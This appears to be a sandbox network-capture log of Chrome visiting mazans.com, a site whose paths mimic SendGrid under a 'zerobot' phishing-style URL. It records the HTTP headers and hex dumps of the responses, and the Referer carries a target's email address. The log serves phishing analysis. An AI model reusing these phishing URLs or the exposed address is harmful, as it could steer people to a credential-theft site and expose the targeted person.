                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:08 UTC8192INData Raw: 34 30 30 30 0d 0a 23 33 34 3b 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 26 23 33 34 3b 72 6f 75 6e 64 26 23 33 34 3b 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 26 23 33 34 3b 72 6f 75 6e 64 26 23 33 34 3b 2f 3e 0a 26 6c 74 3b 2f 73 76 67 3e 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 75 6c 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 65 6e 2d 75 73 2f 73 6f 6c 75 74 69 6f 6e 73 2f 65 6d 61 69 6c 2d 6d 61 72 6b 65 74 69 6e 67 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 3e 4d 61 72 6b 65 74 65 72 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 65 6e 2d 75 73 2f 73 6f 6c 75 74 69 6f 6e 73 2f 65 6e 74 65 72 70 72 69 73 65 22 20 74 61 72 67 65 74
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 4000#34; stroke-linecap=&#34;round&#34; stroke-linejoin=&#34;round&#34;/>&lt;/svg>"> <ul><li><a href="/en-us/solutions/email-marketing" target="_self" rel="noopener noreferrer">Marketers</a></li><li><a href="/en-us/solutions/enterprise" target


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          11192.168.2.1749724184.28.90.27443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:08 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                                                                                                          Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:09 UTC466INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                                                                                                                                          X-CID: 11
                                                                                                                                                                                                                                                                                                                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                                                                                                          X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=87353
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:08 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          X-CID: 2


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          12192.168.2.1749725162.241.85.1724436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:09 UTC769OUTGET /https://sendgrid.com/error/etc.clientlibs/twilio-foundation/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.css HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.com
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:09 UTC261INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:09 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 07 Sep 2022 17:01:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 583
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:09 UTC583INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          13192.168.2.1749726162.241.85.1724436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:09 UTC761OUTGET /https://sendgrid.com/error/etc.clientlibs/twilio-foundation/clientlibs/clientlib-site.lc-91a9f83e57a9c0ac9996388c5a881204-lc.min.css HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.com
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:09 UTC261INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:09 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 07 Sep 2022 17:01:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 583
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:09 UTC583INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          14192.168.2.1749727162.241.85.1724436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:09 UTC760OUTGET /https://sendgrid.com/error/etc.clientlibs/sendgrid/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.css HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.com
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:09 UTC261INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:09 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 07 Sep 2022 17:01:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 583
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:09 UTC583INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          15192.168.2.1749728162.241.85.1724436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:09 UTC752OUTGET /https://sendgrid.com/error/etc.clientlibs/sendgrid/clientlibs/clientlib-site.lc-e2ee9b88808de4233ff130f26c4dc422-lc.min.css HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.com
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:09 UTC261INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:09 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 07 Sep 2022 17:01:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 583
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:09 UTC583INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          16192.168.2.174973299.86.8.1754436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:09 UTC590OUTGET /v1/projects/1CjnBNPybWzyv10ssZRxdwmb8vrYF4yj/integrations HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: cdn.segment.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:10 UTC741INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 209
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                                                                                                                                          x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 27 Sep 2023 22:08:44 GMT
                                                                                                                                                                                                                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                          x-amz-version-id: AR3j4nv9gmDoXsLRJnYBTq9hmL_suUNt
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:10 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=10800
                                                                                                                                                                                                                                                                                                                                                                          ETag: "3d88ed31cd70c5846f109168d704c76a"
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 163be08bc1bc44818353c4fd88655bee.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA6-C1
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: VAbS34fheD3CUVVuC2h4emzbmLP3wq67Ts6Zqty2lpmS92iYFL612w==
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:10 UTC209INData Raw: 5b 7b 22 6e 61 6d 65 22 3a 22 52 65 70 65 61 74 65 72 22 2c 22 63 72 65 61 74 69 6f 6e 4e 61 6d 65 22 3a 22 52 65 70 65 61 74 65 72 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 68 65 20 53 65 67 6d 65 6e 74 20 72 65 70 65 61 74 65 72 20 69 6e 74 65 67 72 61 74 69 6f 6e 20 72 65 70 65 61 74 73 20 61 20 73 6f 75 72 63 65 20 73 74 72 65 61 6d 20 74 6f 20 6f 6e 65 20 6f 72 20 6d 75 6c 74 69 70 6c 65 20 6f 74 68 65 72 20 73 6f 75 72 63 65 73 2e 20 22 2c 22 77 65 62 73 69 74 65 22 3a 22 68 74 74 70 73 3a 2f 2f 73 65 67 6d 65 6e 74 2e 63 6f 6d 22 2c 22 63 61 74 65 67 6f 72 79 22 3a 22 52 61 77 20 44 61 74 61 22 7d 5d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: [{"name":"Repeater","creationName":"Repeater","description":"The Segment repeater integration repeats a source stream to one or multiple other sources. ","website":"https://segment.com","category":"Raw Data"}]


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          17192.168.2.1749755162.241.85.1724436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:09 UTC754OUTGET /https://sendgrid.com/error/etc.clientlibs/twilio-foundation/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.com
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:09 UTC261INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:09 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 07 Sep 2022 17:01:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 583
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:09 UTC583INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          18192.168.2.1749753162.241.85.1724436552C:\Program Files\Google\Chrome\Application\chrome.exe
